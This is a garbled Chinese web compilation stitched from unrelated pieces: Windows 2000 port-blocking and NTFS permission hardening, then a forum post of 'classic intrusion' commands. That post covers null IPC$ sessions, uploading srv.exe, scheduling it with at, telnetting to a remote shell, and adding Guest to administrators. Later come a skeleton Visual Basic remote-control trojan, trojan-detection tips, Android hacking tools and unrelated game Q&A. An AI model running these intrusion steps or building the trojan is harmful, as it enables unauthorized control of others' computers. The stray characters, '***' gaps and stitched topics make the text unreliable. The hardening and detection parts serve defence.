80为网网站服务；21为FTP服务；25为电子邮件简单邮件传输协议服务；110为发邮件给POP3服务。?[U

© 其他还有SQL服务者的端口1433等，你可到网上查找相关资料。那些不用的端口一定要关闭！关闭这些端口，我们可以通过Windows 2000的安全策略进行。B

©《借助它的安全策略，完全可以阻止入侵者的攻击。你可以通过“管理工具→本地安全策略”进入，右击“IP安全策略”，选择“创建IP安全策略”，点[下一步]。输入安全策略的名称，点[下一步]，一直到完成，你就创建了一个安全策略OkQcy

接着你要做的是右击“IP安全策略”，进入管理IP筛选器和筛选器操作，在管理IP筛选器列表中，你可以添加要封锁的端口，这里以关闭ICMP和 139端口为例说明。b]}

关闭了ICMP，黑客软件如果没有强制扫描功能就不能扫描到你的机器，也砰不到你的机器。关闭ICMP的具体操作如下：点[添加]，然后在名称中输入“关闭ICMP”，点右边的[添加]，再点[下一步]。在源地址中选“任何IP地址”，点[下一步]。在目标地址中选择“我的IP地址”，点[下一步]。在协议中选择“ICMP”，点[下一步]。回到关闭ICMP属性窗口，即关闭了ICMP。sf7 FQ

下面我们再设置关闭 139，同样在管理IP筛选器列表中点“添加”，名称设置为“关闭 139”，点右边的“添加”，点[下一步]。在源地址中选择“任何IP地址”，点[下一步]。在目标地址中选择“我的IP地址”，点[下一步]。在协议中选择“TCP”，点[下一步]。在设置IP协议端口中选择从任意端口到此端口，在此端口中输入 139，点下一步。即完成关闭 139端口，其他的端口也同样设置，结果如图 5。f6WL

特别指出的是关闭UDP4000可以禁止校园网中的机器使用 *** 。Q

©然后进入设置管理筛选器操作，点“添加”，点下一步，在名称中输入“拒绝”，点下一步。选择“阻止”，点[下一步]。u然后关闭该属性页，右击新建的IP安全策略“安全”，打开属性页。在规则中选择“添加”，点[下一步]。选择“此规则不指定隧道”，点下一步。在选择 *** 类型中选择“所有 *** 连接”，点下一步。在IP筛选器列表中选择“关闭ICMP”，点[下一步]。在筛选器操作中选择“拒绝”，点下一步。这样你就将“关闭ICMP”的筛选器加入到名为“安全”的IP安全策略中。同样的 *** ，你可以将“关闭 139”等其他筛选器加入进来。添加后的结果如图 7。(8

©《我 最后要做的是指派该策略，只有指派后，它才起作用。 *** 是右击“安全”，在菜单中选择“所有任务”，选择“指派”。IP安全设置到此结束，你可根据自己的情况，设置相应的策略。2

©《设置完成后，你可再用X浏览进行检查，发现问题再补上。9g

通过以上的设置，你的Windows 2000服务器可以说是非常安全了。希望你早日筑起服务器的安全防护林。

Windows下权限设置详解

随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用，WEBSHELL让防火墙形同虚设，一台即使打了所有微软补丁、只让80端口对外开放的WEB服务器也逃不过被黑的命运。难道我们真的无能为力了吗？其实，只要你弄明白了NTFS系统下的权限设置问题，我们可以对crackers们说：NO! 要打造一台安全的WEB服务器，那么这台服务器就一定要使用NTFS和Windows NT/2000/2003。众所周知，Windows是一个支持多用户、多任务的操作系统，这是权限设置的基础，一切权限设置都是基于用户和进程而言的，不同的用户在访问这台计算机时，将会有不同的权限。DOS是个单任务、单用户的操作系统。但是我们能说DOS没有权限吗？不能！当我们打开一台装有DOS操作系统的计算机的时候，我们就拥有了这个操作系统的管理员权限，而且，这个权限无处不在。所以，我们只能说DOS不支持权限的设置，不能说它没有权限。随着人们安全意识的提高，权限设置随着NTFS的发布诞生了。

Windows NT里，用户被分成许多组，组和组之间都有不同的权限，当然，一个组的用户和用户之间也可以有不同的权限。下面我们来谈谈NT中常见的用户组。 Administrators,管理员组，默认情况下，Administrators中的用户对计算机/域有不受限制的完全访问权。分配给该组的默认权限允许对整个系统进行完全控制。所以，只有受信任的人员才可成为该组的成员。

Power Users，高级用户组，Power Users 可以执行除了为 Administrators 组保留的任务外的其他任何操作系统任务。分配给 Power Users 组的默认权限允许 Power Users 组的成员修改整个计算机的设置。但Power Users 不具有将自己添加到 Administrators 组的权限。在权限设置中，这个组的权限是仅次于Administrators的。

Users:普通用户组，这个组的用户无法进行有意或无意的改动。因此，用户可以运行经过验证的应用程序，但不可以运行大多数旧版应用程序。Users 组是最安全的组，因为分配给该组的默认权限不允许成员修改操作系统的设置或用户资料。Users 组提供了一个最安全的程序运行环境。在经过 NTFS 格式化的卷上，默认安全设置旨在禁止该组的成员危及操作系统和已安装程序的完整性。用户不能修改系统注册表设置、操作系统文件或程序文件。Users 可以关闭工作站，但不能关闭服务器。Users 可以创建本地组，但只能修改自己创建的本地组。

Guests:来宾组，按默认值，来宾跟普通Users的成员有同等访问权，但来宾帐户的限制更多。

Everyone:顾名思义，所有的用户，这个计算机上的所有用户都属于这个组。

其实还有一个组也很常见，它拥有和Administrators一样、甚至比其还高的权限，但是这个组不允许任何用户的加入，在察看用户组的时候，它也不会被显示出来，它就是SYSTEM组。系统和系统级的服务正常运行所需要的权限都是靠它赋予的。由于该组只有这一个用户SYSTEM，也许把该组归为用户的行列更为贴切。

权限是有高低之分的，有高权限的用户可以对低权限的用户进行操作，但除了Administrators之外，其他组的用户不能访问 NTFS 卷上的其他用户资料，除非他们获得了这些用户的授权。而低权限的用户无法对高权限的用户进行任何操作。

我们平常使用计算机的过程当中不会感觉到有权限在阻挠你去做某件事情，这是因为我们在使用计算机的时候都用的是Administrators中的用户登陆的。这样有利也有弊，利当然是你能去做你想做的任何一件事情而不会遇到权限的限制。弊就是以 Administrators 组成员的身份运行计算机将使系统容易受到特洛伊木马、病毒及其他安全风险的威胁。访问 Internet 站点或打开电子邮件附件的简单行动都可能破坏系统。不熟悉的 Internet 站点或电子邮件附件可能有特洛伊木马代码，这些代码可以下载到系统并被执行。如果以本地计算机的管理员身份登录，特洛伊木马可能使用管理访问权重新格式化您的硬盘，造成不可估量的损失，所以在没有必要的情况下，更好不用Administrators中的用户登陆。Administrators中有一个在系统安装时就创建的默认用户----Administrator，Administrator 帐户具有对服务器的完全控制权限，并可以根据需要向用户指派用户权利和访问控制权限。因此强烈建议将此帐户设置为使用强密码。永远也不可以从 Administrators 组删除 Administrator 帐户，但可以重命名或禁用该帐户。由于大家都知道“管理员”存在于许多版本的 Windows 上，所以重命名或禁用此帐户将使恶意用户尝试并访问该帐户变得更为困难。对于一个好的服务器管理员来说，他们通常都会重命名或禁用此帐户。Guests用户组下，也有一个默认用户----Guest,但是在默认情况下，它是被禁用的。如果没有特别必要，无须启用此账户。我们可以通过“控制面板”--“管理工具”--“计算机管理”--“用户和用户组”来查看用户组及该组下的用户。

我们用鼠标右键单击一个NTFS卷或NTFS卷下的一个目录，选择“属性”--“安全”就可以对一个卷，或者一个卷下面的目录进行权限设置，此时我们会看到以下七种权限：完全控制、修改、读取和运行、列出文件夹目录、读取、写入、和特别的权限。“完全控制”就是对此卷或目录拥有不受限制的完全访问。地位就像Administrators在所有组中的地位一样。选中了“完全控制”，下面的五项属性将被自动被选中。“修改”则像Power users，选中了“修改”，下面的四项属性将被自动被选中。下面的任何一项没有被选中时，“修改”条件将不再成立。“读取和运行”就是允许读取和运行在这个卷或目录下的任何文件，“列出文件夹目录”和“读取”是“读取和运行”的必要条件。“列出文件夹目录”是指只能浏览该卷或目录下的子目录，不能读取，也不能运行。“读取”是能够读取该卷或目录下的数据。“写入”就是能往该卷或目录下写入数据。而“特别”则是对以上的六种权限进行了细分。读者可以自行对“特别”进行更深的研究，鄙人在此就不过多赘述了。

下面我们对一台刚刚安装好操作系统和服务软件的WEB服务器系统和其权限进行全面的刨析。服务器采用Windows 2000 Server版，安装好了SP4及各种补丁。WEB服务软件则是用了Windows 2000自带的IIS 5.0，删除了一切不必要的映射。整个硬盘分为四个NTFS卷，C盘为系统卷，只安装了系统和驱动程序；D盘为软件卷，该服务器上所有安装的软件都在D盘中；E盘是WEB程序卷，网站程序都在该卷下的WWW目录中；F盘是网站数据卷，网站系统调用的所有数据都存放在该卷的WWWDATABASE目录下。这样的分类还算是比较符合一台安全服务器的标准了。希望各个新手管理员能合理给你的服务器数据进行分类，这样不光是查找起来方便，更重要的是这样大大的增强了服务器的安全性，因为我们可以根据需要给每个卷或者每个目录都设置不同的权限，一旦发生了 *** 安全事故，也可以把损失降到更低。当然，也可以把网站的数据分布在不同的服务器上，使之成为一个服务器群，每个服务器都拥有不同的用户名和密码并提供不同的服务，这样做的安全性更高。不过愿意这样做的人都有一个特点----有钱:)。好了，言归正传，该服务器的数据库为MS-SQL，MS-SQL的服务软件SQL2000安装在d:\ms-sqlserver2K目录下，给SA账户设置好了足够强度的密码，安装好了SP3补丁。为了方便网页 *** 员对网页进行管理，该网站还开通了FTP服务，FTP服务软件使用的是SERV-U 5.1.0.0，安装在d:\ftpservice\serv-u目录下。杀毒软件和防火墙用的分别是Norton Antivirus和BlackICE,路径分别为d:\nortonAV和d:\firewall\blackice,病毒库已经升级到最新，防火墙规则库定义只有80端口和21端口对外开放。网站的内容是采用动网7.0的论坛,网站程序在e:\www\bbs下。细心的读者可能已经注意到了，安装这些服务软件的路径我都没有采用默认的路径或者是仅仅更改盘符的默认路径，这也是安全上的需要，因为一个黑客如果通过某些途径进入了你的服务器，但并没有获得管理员权限，他首先做的事情将是查看你开放了哪些服务以及安装了哪些软件，因为他需要通过这些来提升他的权限。一个难以猜解的路径加上好的权限设置将把他阻挡在外。相信经过这样配置的WEB服务器已经足够抵挡大部分学艺不精的黑客了。读者可能又会问了：“这根本没用到权限设置嘛！我把其他都安全工作都做好了，权限设置还有必要吗？”当然有！智者千虑还必有一失呢，就算你现在已经把系统安全做的完美无缺，你也要知道新的安全漏洞总是在被不断的发现。权限将是你的最后一道防线！那我们现在就来对这台没有经过任何权限设置，全部采用Windows默认权限的服务器进行一次模拟攻击，看看其是否真的固若金汤。

假设服务器外网域名为http://www.webserver.com，用扫描软件对其进行扫描后发现开放WWW和FTP服务，并发现其服务软件使用的是IIS 5.0和Serv-u 5.1，用一些针对他们的溢出工具后发现无效，遂放弃直接远程溢出的想法。打开网站页面，发现使用的是动网的论坛系统，于是在其域名后面加个/upfile.asp，发现有文件上传漏洞，便抓包，把修改过的ASP木马用NC提交，提示上传成功，成功得到WEBSHELL，打开刚刚上传的ASP木马，发现有MS-SQL、Norton Antivirus和BlackICE在运行，判断是防火墙上做了限制，把SQL服务端口屏蔽了。通过ASP木马查看到了Norton Antivirus和BlackICE的PID，又通过ASP木马上传了一个能杀掉进程的文件，运行后杀掉了Norton Antivirus和BlackICE。再扫描，发现1433端口开放了，到此，便有很多种途径获得管理员权限了，可以查看网站目录下的conn.asp得到SQL的用户名密码，再登陆进SQL执行添加用户，提管理员权限。也可以抓SERV-U下的ServUDaemon.ini修改后上传，得到系统管理员权限。还可以传本地溢出SERV-U的工具直接添加用户到Administrators等等。大家可以看到，一旦黑客找到了切入点，在没有权限限制的情况下，黑客将一帆风顺的取得管理员权限。

那我们现在就来看看Windows 2000的默认权限设置到底是怎样的。对于各个卷的根目录，默认给了Everyone组完全控制权。这意味着任何进入电脑的用户将不受限制的在这些根目录中为所欲为。系统卷下有三个目录比较特殊，系统默认给了他们有限制的权限，这三个目录是Documents and settings、Program files和Winnt。对于Documents and settings，默认的权限是这样分配的：Administrators拥有完全控制权；Everyone拥有读运，列和读权限；Power users拥有读运，列和读权限；SYSTEM同Administrators;Users拥有读运，列和读权限。对于Program files，Administrators拥有完全控制权；Creator owner拥有特殊权限;Power users有完全控制权;SYSTEM同Admin

跪求cmd黑客攻击指令和cmd电脑命令！悬赏大大滴有

一 相关命令

建立空连接:

net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)

如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

删除一个ipc$连接

net use \\IP\ipc$ /del

删除共享映射

net use c: /del 删除映射的c盘，其他盘类推

net use * /del 删除全部,会有提示要求按y确认

提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射 *** 驱动器,效果一样.

二 经典入侵模式

1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以之一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

2. C:\copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

3. C:\net time \\127.0.0.1

查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

4. C:\at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）

5. C:\net time \\127.0.0.1

再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

6. C:\telnet 127.0.0.1 99

这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了

7.C:\copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

8. C:\WINNT\system32ntlm

输入ntlm启动（这里的C:\WINNT\system32指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！

9.Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10. C:\net user guest /active:yes

将对方的Guest用户激活

11. C:\net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机).

ipc$经典入侵步骤：

1、net use \\ip\ipc$ 密码 /user:用户名

2、copy 文件名 \\ip\c$

3、net time \\ip

4、at \\ip 时间 命令

5、入侵成功，连接你的肉鸡

常用的 *** 命令

net user 查看用户列表

net user 用户名 密码 /add 添加用户

net user 用户名 密码 更改用户密码

net localgroup administrators 用户名 /add 添加用户到管理组

net user 用户名 /delete 删除用户

net user 用户名 查看用户的基本情况

net user 用户名 /active:no 禁用该用户

net user 用户名 /active:yes 启用该用户

net share 查看计算机IPC$共享资源

net share 共享名 查看该共享的情况

net share 共享名=路径 设置共享。例如 net share c$=c:

net share 共享名 /delete 删除IPC$共享

net stop lanmanserver 关闭ipc$和默认共享依赖的服务

net use 查看IPC$连接情况

net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接

net use \\ip\ipc$ /del 删除一个连接

net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘

net use z: /del

net time \\ip 查看远程计算机上的时间

copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上

net view ip 查看计算机上的共享资源

at 查看自己计算机上的计划作业

at \\ip 查看远程计算机上的计划作业

at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业

at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业

at \\ip all /delete 删除远程计算机上的全部计划作业

at \\ip time "echo 5 c:\t.txt" 在远程计算机上建立文本文件t.txt；

下面纯手打，上面是度娘给的

taskkill /im 进程名 停止运行

tasklisy 查看运行进程

ipconfig 查看本机IP

md 创建文件夹

rd 删除文件夹

echo off .txt|exit 添加文本

echo 内容 .txt 给文本添加内容

copy 复制文件

net user 用户名 密码/add 创建一个普通账号

net localgroup administrators 用户名 /add 把账户加入超级用户组

网站被黑客挂上木马病毒怎么办?

源码中查找可疑代码,删除

如何识别木马

识别木马有新招，希望这篇文章对你有所帮助。

一、经常看到有玩家说，在输入自己的帐号的时候通故意输错帐号和码。其实这种木马是最早期的木马程序。现在已经很少有编木马程序的程序员，还按照这种监听键盘记录的思路去编写木马程序。现在的木马程序已经发展到通过内存提取数据来获得用户的帐号和密码。大家都知道，不管是传奇还是任何一款程序。它都是有他所特有的数据的（包括玩家的帐号、密码，等级装备资料等等）。这些数据都是会通过本机与游戏服务器取得了验证以后，玩家的角色资料才会出现在玩家的面前。而这些数据在运行的时候都是存放在计算机的内存里面的。木马作者只需要在自己的程序里面加入条件语句就可以取得玩家真实的游戏帐号、密码、角色等级~~~~~，以我自己的计算机知识，这种语句的大概意思应该是：当游戏进程进入到让玩家选择角色的时候再从内存中提取最后一次的帐号、密码、角色等级等资料。也就是说，其实玩家之前所做的故意输错帐号或密码完全是浪费自己的表情、浪费自己的时间。

下边先来说一下木马是如何通过网页进入你的电脑的，相信大家都知道，现在有很多图片木马，EML和EXE木马，其中的图片木马其实很简单，就是把木马exe文件的文件头换成bmp文件的文件头，然后欺骗IE浏览器自动打开该文件，然后利用网页里的一段JAVASCRIPT小程序调用DEBUG把临时文件里的bmp文件还原成木马exe文件并拷贝到启动项里，接下来的事情很简单，你下次启动电脑的时候就是你噩梦的开始了，EML木马更是传播方便，把木马文件伪装成audio/x-wav声音文件，这样你接收到这封邮件的时候只要浏览一下，不需要你点任何连接，windows就会为你代劳自动播放这个他认为是wav的音乐文件，木马就这样轻松的进入你的电脑，这种木马还可以frame到网页里，只要打开网页，木马就会自动运行，另外还有一种 *** ，就是把木马exe编译到. *** 文件里，然后在网页里调用，同样也可以无声无息的入侵你的电脑，这只是些简单的办法，还有远程控制和共享等等漏洞可以钻，知道这些，相信你已经对网页木马已经有了大概了解，

简单防治的 *** ：

开始-设置-控制面版-添加删除程序-windows安装程序-把附件里的windows scripting host去掉，然后打开Internet Explorer浏览器，点工具-Internet选项-安全-自定义级别，把里面的脚本的3个选项全部禁用，然后把“在中加载程序和文件”禁用，当然这只是简单的防治 *** ，不过可能影响一些网页的动态java效果，不过为了安全就牺牲一点啦，这样还可以预防一些恶意的网页炸弹和病毒，如果条件允许的话可以加装防火墙，再到微软的网站打些补丁，反正我所知道的网吧用的都是原始安装的windows，很不安全哦，还有尽量少在一些小网站下载一些程序，尤其是一些号称黑客工具的软件，小心盗不着别人自己先被盗了，当然，如果你执意要用的话，号被盗了也应该付出这个代价吧。还有，不要以为装了还原精灵就很安全，据我所知，一般网吧的还原精灵都只还原c:盘即系统区，所以只要木马直接感染你安装在别的盘里的游戏执行文件，你照样逃不掉的。

下边介绍一下木马和如何简单的检查一下是否中了木马。

木马程序一般分为服务器端程序和客户端程序两个部分，当服务器端程序安装在某台连接到 *** 的电脑后，就能使用客户端程序对其进行登陆。这和PcAnywhere以及NetMeeting的远程控制功能相似。但不同的是，木马是非法取得对对方电脑的控制权，一旦登陆成功，就可以取得管理员级的权利，对方电脑上的资料、密码等是一览无余。不过这种木马一般的“伪黑客”很少使用，因为一不小心就会引火上身，被对方反查过来就会偷鸡不成蚀把米了，一般他们都会采用只有服务器端的小木马，这类木马通常会把截取的密码发到一个免费邮箱里，不需要人为操作，有空去收趟邮件就可以了，这种木马遍布互连网的各个角落，的确防不胜防，由于木马程序众多，加之不断有新版本、新品种产生，使得软件无法完全应付，所以手动检查清除是十分必要的。

木马会想尽一切办法隐藏自己，别指望在任务管理器里看到他们的踪影，有些木马更是会和一些系统进程寄生在一起的，如著名的广外幽灵就是寄生在MsgSrv32.exe里；当然它也会悄无声息地启动，木马会在每次用户启动windows时自动装载服务端，Windows系统启动时自动加载应用程序的 *** 木马都会用上，如启动组、win.ini、system.ini、注册表等等都是木马藏身之地；下边简单说一下如何检查，点开始-运行，输入：

msconfig回车 就会打开系统配置实用程序，先点system.ini，看看shell=文件名，正确的文件名应该是“explorer.exe”，如果explorer.exe后边还跟有别的程序的话，就要好好检查这个程序了，然后点win.ini，“run=”和“load=”是可能加载“木马”程序的途径，一般情况下，它们的等号后面什么都没有，如果发现后面跟有路径与文件名不是你熟悉的启动文件，你的计算机就可能中上“木马”了，当然你也得看清楚，因为如“AOL木马”，它把自身伪装成command.exe文件，如果不注意可能不会发现它不是真正的系统启动文件；最后点“启动”，检查里面的启动项是不是有不熟悉的，如果你实在不清楚的话可以把他们全部取消，然后重新运行msconfig，看一下有没有取消的启动项重新被选中的，一般木马都会存在于内存中，（就是线程插入，然后隐藏进程的木马，DLL无进程木马就不会驻留在内存里面，我们在下一次中会讲到）所以发现你取消他的启动项就会自动添加上的，然后你就可以逐步添上你的输入法，音量控制，防火墙等软件的启动项了；还有一类木马，他是关联注册表的文件打开方式的，一般木马经常关联.exe，点开始-运行，输入：regedit回车，打开注册表编辑器，点之一条，也就是HKEY_CLASSES_ROOT，找到exefile，看一下\\exefile\\shell\\open\\command里面的默认键值是不是"%1" %* ，如果是一个程序路径的话就一定是中木马了，另外配合两种以上的杀毒软件也是必要的，另外在windows下木马一般很难清除，最后重新启动到dos环境下再进行查杀。

防木马程序、防火墙、及杀毒软件介绍：

1、木马克星： 专业的个人版木马查杀工具;近100%查杀各种类型木马!玩家推荐反木马品牌~!

2、绿鹰PC万能精灵2.91 ：专业的个人版木马查杀工具;近100%查杀各种类型木马!玩家推荐反木马品牌~!

3、Symantec AntiVirus：这个我就不用再介绍了吧，全球更大的杀毒软件！强力推荐8.1企业版。

4、天网防火墙2.51个人版:天网防火墙个人版在 *** 效率与系统安全上完全采用天网防火墙的设计思想，采用更底层的 *** 驱动隔绝，其作用层在 *** 硬件与Windows *** 驱动之间，在黑客攻击数据接触Windows *** 驱动之前将所有的攻击数据拦截，保护脆弱的Windows *** 驱动不会崩溃

看看这个，是用VB编的木马程序

1.“特洛伊木马”有被称为BO， 是在美国一次黑客技术讨论会上由一个黑客组织推出的。它其实是一种客户机/服务器程序，其利用的原理就是：在本机直接启动运行的程序拥有与使用者相同的权限。因此如果能够启动服务器端（即被攻击的计算机）的服务器程序，就可以使用相应的客户端工具客户程序直接控制它了。下面来谈谈如何用VB来实现它。

使用VB建立两个程序，一个为客户端程序Client，一个为服务器端程序systry。

在Client工程中建立一个窗体，加载WinSock控件，称为tcpClient，协议选择TCP，再加入两个文本框，用以输入服务器的IP地址或服务器名，然后建立一个按钮，按下之后就可以对连接进行初始化了，代码如下：

Private Sub cmdConnect_Click()

If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then

MsgBox ("请输入主机名或主机IP地址。")

Exit Sub

Else

If Len(Text1.Text) 0 Then

tcpClient.RemoteHost = Text1.Text

Else

tcpClient.RemoteHost = Text2.Text

End If

End If

tcpClient.Connect

Timer1.Enabled = True

End Sub

连接建立之后就可以使用DataArrival事件处理所收到的数据了。

连接建立之后就可以使用DataArrival事件处理所收到的数据了。

在服务器端systry工程也建立一个窗体，加载WinSock控件，称为tcpServer，协议选择TCP，在Form_Load事件中加入如下代码：

Private Sub Form_Load()

tcpServer.LocalPort = 1999

tcpServer.Listen

End Sub

准备应答客户端程序的请求连接，使用ConnectionRequest事件来应答户端程序的请求，代码如下：

Private Sub tcpServer_ConnectionRequest

(ByVal requestID As Long)

If tcpServer.State sckClosed Then

tcpServer.Close‘检查控件的 State 属性是否为关闭的。

End If ’如果不是，在接受新的连接之前先关闭此连接。

tcpServer.Accept requestID

End Sub

这样在客户端程序按下了连接按钮后，服务器端程序的ConnectionRequest事件被触发，执行了以上的代码。如果不出意外，连接就被建立起来了。

2. 建立连接后服务器端的程序通过DataArrival事件接收客户机端程序所发的指令运行既定的程序。如：把服务器端的驱动器名、目录名、文件名等传到客户机端，客户机端接收后用TreeView控件以树状的形式显示出来，浏览服务器端文件目录；强制关闭或重启服务器端的计算机；屏蔽任务栏窗口；屏蔽开始菜单；按照客户机端传过来的文件名或目录名，而删除它；屏蔽热启动键；运行服务器端的任何程序；还包括获取目标计算机屏幕图象、窗口及进程列表；激活、终止远端进程；打开、关闭、移动远端窗口；控制目标计算机鼠标的移动与动作；交换远端鼠标的左右键；在目标计算机模拟键盘输入，下载、上装文件；提取、创建、修改目标计算机系统注册表关键字；在远端屏幕上显示消息。DataArrival事件程序如下：

Private Sub tcpServer_DataArrival

(ByVal bytesTotal As Long)

Dim strData As String

Dim i As Long

Dim mKey As String

tcpServer.GetData strData

‘接收数据并存入strData

For i = 1 To Len(strData)

‘分离strData中的命令

If Mid(strData, i, 1) = "@" Then

mKey = Left(strData, i - 1)

‘把命令ID号存入mKey

‘把命令参数存入strData

strData = Right(strData, Len(strData) - i)

Exit For

End If

Next i

Select Case Val(mKey)

Case 1

‘驱动器名、目录名、文件名

Case 2

强制关闭服务器端的计算机

Case 3

强制重启服务器端的计算机

Case 4

屏蔽任务栏窗口；

Case 5

屏蔽开始菜单；

Case 6

按照客户机端传过来的文件名或目录名，而删除它；

Case 7

屏蔽热启动键；

Case 8

运行服务器端的任何程序

End Select

End Sub

详细程序略。

客户机端用tcpClient.SendData发命令。命令包括命令ID和命令参数，它们用符号“@”隔开。

另外，当客户机端断开与服务器端的来接后，服务器端应用tcpServer_Close事件，来继续准备接收客户机端的请求，其代码如下：

Private Sub tcpServer_Close()

tcpServer.Close

tcpServer.Listen

End Sub

这就是一个最基本的特洛伊木马程序，只要你的机器运行了服务器端程序，那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了，在我的源程序中有一中 *** ，是修改系统注册表的 *** 。

这就是一个最基本的特洛伊木马程序，只要你的机器运行了服务器端程序，那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了，在我的源程序中有一中 *** ，是修改系统注册表的 *** 。

成功的特洛伊木马程序要比这个复杂一些，还有程序的隐藏、自动复制、传播等问题要解决。警告：千万不要用BO程序破坏别人的系统。

模拟城市5从游侠上下的 打开以后出来SIMCITY然后就未响应 会跳出来一个RAZOR1911的窗口 我要怎么弄？

这个直接把它关掉即可，关不掉的话就跳出全屏用任务管理器来关，

Razor1911是很出名的破解黑客，如果出现这个窗口表明他们参与了游戏破解。

nds模拟器的问题

首先，只要你的游戏是中文版就能存档，NO$GBA2.6a模拟器不能即时存读档，只能用游戏里的存档功能

其次，你调了按钮之后在Options那里最后一项是Save

Options，要点一下保存设置才可以的

2016 黑客的 Android 工具箱都有哪些

AndroRAT

AndroRAT一词源自Android与RAT（即远程管理工具）。这款顶级黑客工具已经拥有相当长的发展历史，而且最初其实是一款客户端/服务器应用。这款应用旨在帮助用户以远程方式控制Android系统，同时从其中提取信息。这款Android应用会在系统启动完成后以服务形式开始运行。因此，如果用户并不需要与该服务进行交互。此应用还允许大家通过呼叫或者短信等方式触发服务器连接。

这款极具实用性的Android黑客应用之功能包括收集联系人、通话记录、消息以及所在位置等信息。此应用还允许大家以远程方式对接收到的消息以及手机运行状态加以监控，进行手机呼叫与短信发送，通过摄像头拍摄照片以及在默认浏览器当中打开URL等等。

Hackode

Hackode是一款Android应用，其基本上属于一整套工具组合，主要面向高阶黑客、IT专家以及渗透测试人员。在这款应用当中，我们可以找到三款模块——Reconnaissance、Scanning以及Security Feed。

通过这款应用，大家可以实现谷歌攻击、SQL注入、MySQL Server、Whois、Scanning、DNS查找、IP、MX记录、DNS Dif、Security RSS Feed以及漏洞利用等功能。这是一款出色的Android黑客应用，非常适合入门者作为起步工具且无需提供任何个人隐私信息。

zANTI

zANTI是一款来自Zimperium的知名Android黑客套件。此软件套件当中包含多种工具，且广泛适用于各类渗透测试场景。这套移动渗透测试工具包允许安全研究人员轻松对 *** 环境加以扫描。此工具包还允许IT管理员模拟出一套先进黑客环境，并以此为基础检测多项恶意技术方案。

大家可以将zANTI视为一款能够将Backtrack强大力量引入自己Android设备的应用。只要登录至zANTI，它就会映射整套 *** 并嗅探其中的cookie以掌握此前曾经访问过的各个网站——这要归功于设备当中的ARP缓存。

应用当中的多种模块包括 *** 映射、端口发现、嗅探、数据包篡改、DoS以及MITM等等。

沙雕模拟器的三个黑客碎片在哪

沙雕模拟器是一款非常好玩的休闲模拟游戏。游戏整个过程自由度超高，多种模式玩法让玩家体验。大量丰富的任务等待玩家挑战，玩家可以使用各种道具进行闯关，收集武器装备枪支弹药射击对手。黑客碎片是游戏相对而言比较重要的一件道具，那么这里就主要就为大家介绍一下沙雕模拟器三个黑客碎片获取 *** 。

1、进入游戏后，寻找如下图所示的一辆自行车。

2、找到自行车后，骑着自行车沿这如图所示方向出发。

3、东西很好找的，如图所示。

4、骑到目的地即可看到黑客碎片。